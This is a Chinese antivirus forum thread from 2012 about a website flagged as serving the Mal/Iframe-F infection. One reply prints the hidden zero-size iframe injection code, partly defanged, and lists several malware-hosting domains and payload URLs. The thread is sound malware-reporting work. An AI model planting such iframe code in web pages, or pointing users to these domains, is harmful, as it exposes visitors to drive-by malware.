查看: 1464|回复: 5
收起左侧

[已鉴定] http://swxnmzyj.org/listnews.asp[恶意]

 关闭 [复制链接]
firefox3
发表于 2012-4-17 13:08:10 | 显示全部楼层 |阅读模式
本帖最后由 疯狂的小鬼 于 2012-4-17 13:55 编辑

20120417 050201        在 "C:\Users\A\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D0IV3F7M\listnews[1].htm" 中检测到 病毒/间谍软件'Mal/Iframe-F'。清除不可用。
20120417 050435        在 "C:\Users\A\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\O5JU9A86\listnews[1].htm" 中检测到 病毒/间谍软件'Mal/Iframe-F'。清除不可用。

K.JPG

用IE进,sophos不报
用搜狗进,sophos就报
怎么回事?
said411f
发表于 2012-4-17 13:27:29 | 显示全部楼层
本帖最后由 said411f 于 2012-4-17 13:32 编辑

<iframe src=hxxp://127.0.0.1/m.htm width=0 height=0>

Description:

A hidden (and possibly malicious) iframe was identified. It is sometimes encoded with javascript to hide the fact that an iframe call is present. Loads malware from multiple sources:

fenkaololo.com
oooabterast0.co.cc
curem.net/t.php?id=455564
koska.sytes.net/phl/logs/index.php

Malware dump (sample of malware):
<iframe width=”1” height=`1` src=”hxxp://fenkaololo.com/mmmsss/xpxlkzbuaodwitdwy.php”..

评分

参与人数 1经验 +10 收起 理由
帅就是帅 + 10 版区有你更精彩: )

查看全部评分

zx900930
发表于 2012-4-17 14:53:27 | 显示全部楼层
火狐直接拦截
wjcharles
发表于 2012-4-17 16:24:02 | 显示全部楼层
茉莉花开
发表于 2012-4-17 20:46:08 | 显示全部楼层
捕获.JPG

晕,没拦截
656635525
发表于 2012-4-18 10:35:57 | 显示全部楼层
拦截4.png
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-1 14:04 , Processed in 0.138671 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表